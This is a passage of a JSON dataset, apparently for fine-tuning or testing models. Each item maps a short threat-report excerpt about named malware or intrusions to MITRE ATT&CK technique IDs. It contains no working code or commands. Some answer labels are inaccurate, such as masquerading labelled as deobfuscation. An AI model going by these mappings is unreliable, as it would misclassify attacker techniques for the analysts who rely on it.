base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Uses BITSAdmin to download and install payloads.", + "output": "- T1588.002: Obtain Capabilities - Tool" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sideloading happens after the steps described earlier \u2014 the threat actor successfully exploited Log4j and downloaded mfeann.exe, LockDown.DLL, and c0000012.log.", + "output": "- T1203: Exploitation for Client Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Notably, one of the tools used in the attack exploited the CVE 2021 21551 vulnerability in a Dell driver in what was the first recorded abuse of this security flaw.", + "output": "- T1211: Exploitation for Defense Evasion\n- T1190: Exploit Public-Facing Application\n- T1588.006: Obtain Capabilities - Vulnerabilities" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The ransomware payload is copied to the ADMIN$ share of a remote system, and Impacket is used to remotely create a Windows Scheduled Task on target systems to execute the payload", + "output": "- T1021.002: Remote Services - SMB/Windows Admin Shares\n- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "QAKBOT can maintain persistence by creating an auto-run Registry key", + "output": "- T1587.001: Develop Capabilities - Malware\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The ProxyShell elevation of privilege on the Exchange PowerShell Backend (CVE-2021-34523), Windows Background Intelligent Transfer Service (BITS) improperly handling symbolic links (CVE-2020-0787), and abusing the CMSTPLUA COM interface have all been seen as methods of privilege escalation.", + "output": "- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Interestingly, the actors chose to leverage Cobalt Strike for lateral movement. The first of several beacon files are dropped onto the same infected endpoint running Brute Ratel C4, with the first being:", + "output": "- T1588.001: Obtain Capabilities - Malware\n- T1588.002: Obtain Capabilities - Tool" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "QAKBOT has gained execution through users opening malicious attachments", + "output": "- T1204: User Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware will ultimately be extracted to the %LocalAppData%\\Packages\\PXT folder, which includes the PHP.exe local interpreter, various scripts used to steal information, and supporting tools, as shown below.", + "output": "- T1059: Command and Scripting Interpreter\n- T1588.001: Obtain Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Amavis analyzes the e-mail attachments and inspects the contents of the attached archive. It invokes cpio and CVE-2015-1197 is triggered.", + "output": "- T1566.001: Phishing - Spearphishing Attachment\n- T1546: Event Triggered Execution\n- T1588.006: Obtain Capabilities - Vulnerabilities" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The vulnerability tracked as CVE-2022-41352 is a remote code execution flaw that allows attackers to send an email with a malicious archive attachment that plants a web shell in the ZCS server while, at the same time, bypassing antivirus checks.", + "output": "- T1566.001: Phishing - Spearphishing Attachment\n- T1505.003: Server Software Component - Web Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cobalt Strike can use PsExec to execute a payload on a remote host. It can also use Service Control Manager to start new services", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When neither of the previous commands are received, the message is taken as a command to be executed with cmd.exe. The output is sent to the server.", + "output": "- T1059: Command and Scripting Interpreter\n- T1202: Indirect Command Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Both Advanced Port Scanner and NetScan have been used to discover local network infrastructure devices and services running on remote hosts. Active Directory queries for remote systems have been performed by ADFind.", + "output": "- T1046: Network Service Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Racealer (aka RaccoonStealer) is known to be a stealer-type malware that mostly extracts user credentials and exfiltrates data from compromised machines.", + "output": "- T1552.001: Unsecured Credentials - Credentials In Files\n- T1588.001: Obtain Capabilities - Malware\n- T1020: Automated Exfiltration" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "REvil reached its pinnacle of success in the first half of 2021, compromising thousands of companies in a Kaseya MSP supply-chain attack, demanding a $50 million payment from computer maker Acer, and extorting Apple using stolen blueprints of non-yet-released devices.", + "output": "- T1588.001: Obtain Capabilities - Malware\n- T1189: Drive-by Compromise" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "QAKBOT abuses Wscript to execute a Jscript file.", + "output": "- T1587.001: Develop Capabilities - Malware\n- T1059.007: Command and Scripting Interpreter - JavaScript" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "QAKBOT uses obfuscation across two script files, a JavaScript (.js) file and a Batch Script (.cmd) file, likely in an effort to conceal suspicious-looking command lines. ", + "output": "- T1059: Command and Scripting Interpreter\n- T1027: Obfuscated Files or Information\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- T1059.007: Command and Scripting Interpreter - JavaScript" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Initial QAKBOT .zip file bypasses some antivirus detections due to password protections.", + "output": "- T1588.001: Obtain Capabilities - Malware\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In rare cases, LockBit 2.0 has been observed to create accounts for persistence with simple names, such as \u201ca.\u201d", + "output": "- T1136.001: Create Account - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Vulnerabilities such as ProxyShell (CVE-2021-34473) and improper SQL sanitization (CVE-2021-20028) have been observed being utilized as footholds into the environment.", + "output": "- T1190: Exploit Public-Facing Application\n- T1588.006: Obtain Capabilities - Vulnerabilities" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As seen with other ransomware cases, Mimikatz is a key player in dumping credentials but LockBit 2.0 has been occasionally seen utilizing MiniDump as well.", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "There is a command ftpversion that uploads the version of the backdoor (hardcoded) to a file `ver.txt` on the FTP server, in the root folder for the target.", + "output": "- T1059: Command and Scripting Interpreter\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In early February 2022, we witnessed an intrusion employing Gootloader (aka GootKit) as the initial access vector. The intrusion lasted two days and comprised discovery, persistence, lateral movement, collection, defense evasion, credential access and command and control activity. During the post-exploitation phase, the threat actors used RDP, WMI, Mimikatz, Lazagne,\u2026 .", + "output": "- T1588.001: Obtain Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "2. The perpetrators distributed PlugX messages to employees- personal addresses, claiming to come from fellow members of staff. The letters contained photos of alleged senders. Along with the photos, all the information about personal mailboxes could have been collected during the group-s initial presence on corporate workstations.", + "output": "- T1598: Phishing for Information\n- T1114: Email Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Androrat is an open source remote management tool developed by a team of four for a university project. Open source code was upload to the GitHub website in 2012. It is a remote management tool that allows remote control of mobile devices using a computer.", + "output": "- T1588.001: Obtain Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When executed, the final macro code as interpreted by CMD decodes into a classic PowerShell download cradle that fetches the initial QakBot payload. There is one last bit of obfuscation here as the script does contain two more encoded strings. One is the URL as seen above in Figure 8, and another is the full path to which the payload will initially be written: \u201cC:\\Users\\Public\\tmpdir\\file\u201d.\u00a0", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": ". The attackers have also used file names and export API names in the CRAT DLLs to masquerade the RAT as a benign application's library. Some examples of the exported function names are:. ", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The sample was first uploaded to VT on the 2018-10-12 from the Ukraine. It exhibits an encoding and a code style that are similar to those used by former series of Hades droppers. Nevertheless, it introduces new features like anti-analysis and delayed execution, which were only used by the second stage payload in the past.", + "output": "- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This resembled the server-side ASPX payload of the China Chopper webshell documented previously. Uploads to VirusTotal in late August 2018 resembling the same filename, iisstart.aspx, indicate the deployed webshell was likely a version of the China Chopper webshell known to have been used by several Chinese threat actors.", + "output": "- T1588.001: Obtain Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If we look historically, BelialDemon has been involved in the development of malware loaders. BelialDemon is considered the primary developer of TriumphLoader, a loader previously posted about on several forums, and has experience with selling this type of malware.", + "output": "- T1588.001: Obtain Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FireEye\u2019s blog, \u201cHighly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims with SUNBURST Backdoor,\u201d contains a wealth of useful information, all of which has been analyzed by Unit 42 researchers to help ensure Palo Alto Networks customers are protected.", + "output": "- T1195: Supply Chain Compromise" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Towards the end of July, we observed an intrusion that began with IcedID malware and ended in XingLocker ransomware, a Mountlocker variant. XingLocker made its first appearance in early May of this year. The new group was featured in the AstroLocker ransomware blog, and it has been very active since then.", + "output": "- T1588.001: Obtain Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In 2014, a European corporation was compromised prior to constructing a manufacturing facility in Vietnam.. In 2016, Vietnamese and foreign-owned corporations working in network security, technology infrastructure, banking, and media industries were targeted.\u00a0. In mid-2016, malware that FireEye believes to be unique to APT32 was detected on the networks of a global hospitality industry developer with plans to expand operations into Vietnam.. From 2016 through 2017, two subsidiaries of U.S. and Philippine consumer products corporations, located inside Vietnam, were the target of APT32 intrusion operations.", + "output": "- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The first versions of these new USB stealer modules appeared around February 2015 and the latest appear to have been compiled in May 2015. Older versions of these USBSTEALER modules were previously described by our colleagues from ESET.", + "output": "- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While investigating some malicious activity in Central Asia, we identified a new backdoor, named Tunnus, which we attribute to Turla. This is.NET-based malware with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the threat actor has built its C2 infrastructure with vulnerable WordPress installations.", + "output": "- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": ". . Once the second stage is extracted and run, we are presented with the final stage of this attack, which we refer to as ComboJack. Once ComboJack is extracted it begins by copying itself to the following location:", + "output": "- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Spora ransomware, which began circulating in January of this year, is a ransomware noted for its sophistication, including top-notch customer support to victims, and was likely created by professional malicious actors.", + "output": "- T1588.001: Obtain Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The 2019 Linux variant of the GoldMax backdoor is almost identical in functionality and implementation to the previously identified May 2020 Windows variant. The very few additions to the backdoor between 2019 and 2020 likely reflect its maturity and longstanding evasion of detections. It is likely GoldMax has been used as a long-term persistence backdoor during StellarParticle-related compromises, which would be consistent with the few changes made to the malware to modify existing functions or support additional functionality.", + "output": "- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Elknot, also known as BillGates, a very long live and active ddos botnet which targeted Linux systems and was later ported to the Windows platform[4]\u3002. . Now we see Elknot setting its foot on both platforms for this vulnerability, and sharing the same C2 .", + "output": "- T1584.005: Compromise Infrastructure - Botnet" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Janicab\u2019s features also remind us of Powersing\u2019s: the sample contains VM detection based on the MAC address of the machine, looks for malware analysis programs and has familiar antivirus software evasion routines. Janicab also periodically sends screenshot captures of the victim\u2019s desktop to the C&C and appears to enable the execution of arbitrary Python scripts.", + "output": "- T1059.006: Command and Scripting Interpreter - Python\n- T1113: Screen Capture\n- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Functionally, Gauss is designed to collect as much information about infected systems as possible, as well as to steal credentials for various banking systems and social network, email and IM accounts. The Gauss code includes commands to intercept data required to work with several Lebanese banks \u2013 for instance, Bank of Beirut, Byblos Bank, and Fransabank.", + "output": "- T1082: System Information Discovery\n- T1114: Email Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "GandCrab 2 is far from a merely repackaged GandCrab 1. It contains fixes for several flaws in the original, including one critical encryption flaw that would have trivially allowed a universal decryptor (more on this below).", + "output": "- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The main loader and privilege escalation tool, \u201cautorun.exe\u201d fires up a special dropper, which is actually an Equation Group DoubleFantasy implant installer. The installer is stored as \u201cshow.dll\u201d in the \u201cPresentation\u201d folder of the CDROM.", + "output": "- 